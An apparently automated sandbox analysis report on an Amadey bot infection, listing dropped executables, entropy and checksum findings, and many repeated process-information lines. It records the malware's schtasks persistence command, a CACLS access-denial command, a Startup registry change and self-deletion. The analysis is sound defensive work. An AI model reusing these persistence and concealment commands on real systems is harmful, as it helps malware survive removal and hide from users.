Source: ohcompettitive.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x4dbf
Source: jfshvii.1.dr	Static PE information: real checksum: 0xf51e should be: 0x1096f
Source: k4215493.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x2c23
Source: ohcompetitive.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x91b1
Source: l2956268.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x43061
Source: j8994074.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x3191b
Source: n7660022.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x31918
Source: pdates.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x43061
Source: B29C.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x174254

Source: C:\Users\user\AppData\Local\Temp\B29C.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6825859

Source: initial sample	Static PE information: section name: .text entropy: 7.876606251361052
Source: initial sample	Static PE information: section name: .text entropy: 7.876606251361052

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pdates.exe PID: 6940, type: MEMORYSTR

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jfshvii			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	File created: C:\Users\user\AppData\Local\Temp\7_Fjlbt.cpl			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\D217.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3448.exe	File created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3448.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jfshvii	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	File created: C:\Users\user\AppData\Local\Temp\7_Fjlbt.cpl	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D217.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B29C.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D217.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3448.exe	File created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6F2B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00931AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		5_2_00931AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		6_2_00CE1AE8

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\q4b165cujp.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\jfshvii:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\B29C.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Process information set: NOOPENFILEERRORBOX
